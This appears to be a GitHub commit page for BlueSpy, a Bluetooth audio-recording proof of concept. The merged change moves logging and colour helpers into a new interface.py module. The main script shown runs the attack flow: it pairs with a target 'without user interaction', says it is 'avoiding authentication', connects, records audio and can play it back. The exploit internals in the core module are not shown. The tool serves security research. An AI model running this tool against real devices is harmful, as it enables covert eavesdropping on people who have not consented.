Skip to content

Commit

Permalink
Merge pull request TarlogicSecurity#5 from antoniovazquezblanco/inter…
Browse files Browse the repository at this point in the history
…face

Refactor interface code to its own module
  • Loading branch information
jesusgomezmoreno authored Mar 25, 2024
2 parents 2ddf49a + 2cc7ec1 commit 8928cb7
Show file tree
Hide file tree
Showing 2 changed files with 88 additions and 37 deletions.
64 changes: 27 additions & 37 deletions BlueSpy.py
Original file line number Diff line number Diff line change
@@ -1,23 +1,19 @@
#!/usr/bin/env python3

import argparse
from interface import bcolors, color_print, log_info, log_warn, input_yn
from core import connect, BluezTarget, BluezAddressType, pair, record, playback
import time


class bcolors:
HEADER = "\033[34m"
OK_BLUE = "\033[94m"
OK_CYAN = "\033[96m"
OK_GREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"


def main():
# Cool banner...
color_print(bcolors.HEADER, "░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░")
color_print(bcolors.HEADER, "░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░")
color_print(bcolors.HEADER, "░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░")
color_print(bcolors.HEADER, "░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░")
print(f"Bluetooth audio recording tool by {bcolors.HEADER}Tarlogic{bcolors.ENDC}")

# Parse command line arguments...
parser = argparse.ArgumentParser(
prog="No interaction recording",
description="Try to pair to a device, connect to it and record sound without user interaction",
Expand Down Expand Up @@ -60,37 +56,31 @@ def main():
default=False,
action='store_true'
)

args = parser.parse_args()

print(f"{bcolors.HEADER}░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░{bcolors.ENDC}")
print(f"{bcolors.HEADER}░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░{bcolors.ENDC}")
print(f"{bcolors.HEADER}░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░{bcolors.ENDC}")
print(f"{bcolors.HEADER}░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░{bcolors.ENDC}")
# Convert args to target
target = BluezTarget(args.address, args.address_type)

print(f"Bluetooth audio recording tool by {bcolors.HEADER}Tarlogic{bcolors.ENDC}")
print()
print(
f"[{bcolors.OK_GREEN}I{bcolors.ENDC}] Avoiding authentication with {args.address}..."
)
print(f"[{bcolors.OK_GREEN}I{bcolors.ENDC}] Generating shared key...")
pair(BluezTarget(args.address, args.address_type), verbose=args.verbose)
print(f"[{bcolors.WARNING}!{bcolors.ENDC}] Key generated")
print(f"[{bcolors.OK_GREEN}I{bcolors.ENDC}] Establishing connection...")
# Run the PoC!
log_info(f"Avoiding authentication with {args.address}...")
log_info(f"Generating shared key...")
pair(target, verbose=args.verbose)

log_warn(f"Key generated")
log_info(f"Establishing connection...")
time.sleep(1)
connect(BluezTarget(args.address, args.address_type), verbose=args.verbose)
print(f"[{bcolors.OK_GREEN}I{bcolors.ENDC}] Starting audio recording...")
print(f"[{bcolors.WARNING}!{bcolors.ENDC}] Recording!")
connect(target, verbose=args.verbose)

log_info(f"Starting audio recording...")
log_warn(f"Recording!")
time.sleep(1)
record(BluezTarget(args.address), outfile=args.outfile, verbose=args.verbose)
print(f'[{bcolors.WARNING}!{bcolors.ENDC}] Recording stored in "{args.outfile}"')
record(target, outfile=args.outfile, verbose=args.verbose)

print(f"[{bcolors.OK_BLUE}?{bcolors.ENDC}] Play audio back? ")
option = input("[Y/n] ") or "y"
if option.lower() in ("y", "yes"):
print(f"[{bcolors.WARNING}!{bcolors.ENDC}] Playing audio back!")
log_warn(f"Recording stored in \"{args.outfile}\"")
play_back = input_yn("Play audio back?")
if play_back:
playback(args.sink, args.outfile, verbose=args.verbose)
print(f"[{bcolors.OK_GREEN}I{bcolors.ENDC}] Exiting")
log_info(f"Exiting")


if __name__ == "__main__":
Expand Down
61 changes: 61 additions & 0 deletions interface.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,61 @@
#!/usr/bin/env python3

"""
Logging and text interface related code.
"""


class bcolors:
HEADER = "\033[34m"
OK_BLUE = "\033[94m"
OK_CYAN = "\033[96m"
OK_GREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"


class loglevel:
INFO = ("I", bcolors.OK_GREEN)
WARN = ("!", bcolors.WARNING)
INPUT = ("?", bcolors.OK_BLUE)
DEBUG = ("D", bcolors.OK_BLUE)


def color_print(color: bcolors, msg: str):
"""
Print a string with the selected color.
"""
print(f"{color}{msg}{bcolors.ENDC}")


def log(level: loglevel, msg: str):
"""
Print a string with the selected log level.
"""
print(f"[{level[1]}{level[0]}{bcolors.ENDC}] {msg}")


def log_info(msg: str):
"""
Print an info string.
"""
log(loglevel.INFO, msg)


def log_warn(msg: str):
"""
Print a warning string.
"""
log(loglevel.WARN, msg)


def input_yn(msg: str) -> bool:
"""
Get a yes/no answer to a prompt.
"""
log(loglevel.INPUT, msg)
option = input("[Y/n] ") or "y"
return option.lower() in ("y", "yes")

0 comments on commit 8928cb7

Please sign in to comment.